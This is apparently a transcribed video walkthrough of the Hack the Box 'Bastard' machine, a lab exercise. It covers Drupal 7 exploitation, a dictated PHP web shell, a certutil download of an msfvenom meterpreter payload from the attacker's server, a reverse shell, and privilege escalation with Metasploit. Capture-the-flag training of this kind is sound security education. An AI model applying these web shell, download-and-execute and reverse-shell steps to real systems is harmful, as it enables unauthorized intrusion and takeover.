Hi, welcome back. My name is Sleeper with another Hack the Box walkthrough. Today a bastard. And boy, was it one. So let's start off with the nmap scan. We will grab that IP and begin. Do a simple scan to start off. Should be pretty quick here. Today's walkthrough is brought to you by Hack the Box. Sign up today for a VIP plan to gain access to retired machines like this one. You can subscribe with my affiliate link below. Alright, so this pulled up. We got port 80 open. We'll do a more aggressive scan next. This takes a minute here, so I did save them this time through. Take a look. So, we got a header, Drupal 7. We'll copy that. And let's just visit this real quick in our browser. So, copy this here. Paste that in, and it's bastard login. We'll try just admin. That doesn't work. And here we got Drupal. So we'll jump back, check out one of these here, like this. Let's check out this directory. Oh yeah, so I have these saved here. So let's just get those going. Derb, HTTP, grab the IP, as I like to do. Start a derb scan and also start a nicto scan. Okay. Now we'll visit that install directory here. Okay. Oops. Okay. Some requirements for the Drupal. Let's try to find Drupal version. See if there's anything in here. We saw 7, but just seeing if there's any more information on that. So, looks like there's nothing there. So, what we can do next is just see if there's anything here with searchsploit. So we'll do searchsploit Drupal 7. Okay, so we got a number of things, and let's look towards the top. So we have some admin user, admin session, remote code execution. That sounds appealing. And this one here, another remote code execution. So we'll try this one here. According to some research, with this release date here, you can find that this is the exploit that we want to use here. So we'll search exploit it -m and paste that there. And we'll take a look inside, like I've already done. And here we go, some elements to change. So we do want to change the URL to our address. Not sure about this, so we'll just verify that. rest underscore endpoint couldn't be found. How about just rest? Okay. So then, does this work now? Still couldn't be found. So let's just change that part of the code to rest. And here, I'll just change this to a more simple name. And this to a reverse, not reverse, but a workable shell from the browser. So I'm just going to grab that piece of code, paste that in. There we go. So bracket, question mark, PHP system, parentheses, $_ underscore request, all caps, bracket, quote, CMD, quote, close bracket, close parentheses, semicolon, space, question mark, end, caret, and quote. And we'll save that. And PHP that. And I should preface, when I first ran this box, this wouldn't work before. It needed a line of code, so I'll go ahead and just provide that for you here. We just had to do app install PHP curl. So within the line, within the exploit itself, it's going to use a curl, but since it's not inherently installed, we have to install it before running this exploit. So now we ran the exploit and we're able to visit this in our browser, so we'll go ahead and open that link. And with a working browser, we do question mark CMD equals and then the command. So we can do dir. It's a little shaky here, but we can run system info as well. Get the specs. It's a 64 based processor, Microsoft Windows Server 2008 data center. So from here we want to try to get a reverse shell. How do we do that? Well, let's see if certutil is available. .exe and the rest of the command here. So let me go ahead and move to our folder and just try a test document first. So we'll do nano test, .txt. As we learned previously, this is a test. This is test. And it's got the extension test. So we'll host that on a server. Okay. I'm going to refer to my notes here for that certutil command. Alright. I'm just going to paste that in over here. So it's certutil.exe, and I deleted it, dash URL cache, dash split, dash F, and then in quotes, what we're hosting on. I'm on port 8000, and not the shell quite yet. We're going to try the test. Okay. So, it's successful. And then if we dir, we can see if it's here. And there it is. So we can try to type it or show its contents. This is test. This truly is test. Okay. So now we can use that same command as you might have seen previously with a shell. So let's run that command to set that shell up. So I'm going to do a msf console. It's going to be here because I've done this before. So msfvenom -p with our payload that we found out of x64, Windows x64 we're going to go meterpreter with a reverse TCP on our L host with L port 4444 and the output of shell.exe. And then I'm going to go ahead and boot up Metasploit to get that multi-handler set up. Let this run for a moment. I had tried just a reverse shell previously, was able to get the shell, but wasn't able to prevesc from there. So we're going to go the meterpreter route here. We're going to host that server one more time using that same command, certutil, this time with the shell.exe. It's been uploaded. We'll verify that it's here. And there it is. So we'll just set this up to run and jump back to our use exploit / multi handler in Metasploit. So we want to change that. So we'll set payload to Windows x64 meterpreter reverse TCP / okay, and check out our options. Set the L host to tunnel and set that listener up. So that's all set up. We've got our shell ready to go. We'll hit enter. And here comes our shell. We're in a folder in netpub / drupal. Heading back to our first flag on Dimitri's desktop. And then you can cat that. There we go. Oops. Yeah, you can cat it. User.txt. Okay. So now we're going to go and try to access the admin administrator. Access denied. Okay. So that's meaning we don't have privilege. We're going to background this section. We're going to do like before. And we're going to search first for the suggester. And we're going to use that local exploit suggester. I'll preface this by saying I had to run sudo apt update, sudo apt upgrade, and also it was, one moment here, sudo apt install Metasploit framework, just to make sure everything was up to date before running this exploit. So we'll check our options, or before running this exploit suggester, that is. Set session to 1, and we're going to run. So this will take a moment here. Hopefully it's faster than it is slower. Taking a moment here. I also forgot to mention, I was doing this in the pwn box, and nothing was working. I was in the reverse shell. I was trying to upload WinPs. I was trying to export the system info and run the alternative Windows prevesc suggesters with no success. When I tried this as well, it ran into an error. So if you're using the pwn box, you just kind of get faulty information without anything coming through. So it wasn't until I switched over, I was like, okay, I'm going to try this in the Kali box, see if this works. Didn't work until I upgraded, and updated Metasploit, the Metasploit framework. So here we go, it's collecting exploits. And we're halfway there. Alright, so we've got some results here, about 13 that look promising. The first 3 don't work. A couple of them do. So this does not work, this does not work, or does it? I believe this one works, as well as this one. I tried this. I don't remember trying that. This one works. This first one works. So we'll use this one. Use exploit. Check our options. Set session to 1. Set lhost to tunnel, and hit run. You'll notice if you go through and try the other ones, the exploit target, it's going to be x86, thereby canceling out that option. So we got a shell. We move to the administrator's desktop. And there we go. We can cat another flag. So once again, my name is Sleeper. In this box, we found the ability to upload a working shell to the browser. From there, we're able to run a meterpreter shell and gain access initially into the box. From there, we were able to background that session in meterpreter, run the local exploit suggester, and from that list, a few of them work. So give that a shot, and until next time, take care. Are you looking for a more guided approach into cybersecurity? Consider joining Evolve Security Academy's Cybersecurity Bootcamp that gives you the structure you need. Led by instructors working in the field, Evolve Cybersecurity Bootcamp lays the perfect foundation to jumpstart your career in information security. For more information, check out the links below. If you're looking for a more structured approach towards your OSCP, then Evolve Security Academy's OSCP Bootcamp is just for you. Led by experienced pen testers, Evolve's OSCP Bootcamp will give you the experience, skills, and confidence you need to pass the OSCP exam. For those interested, contact me for a referral discount.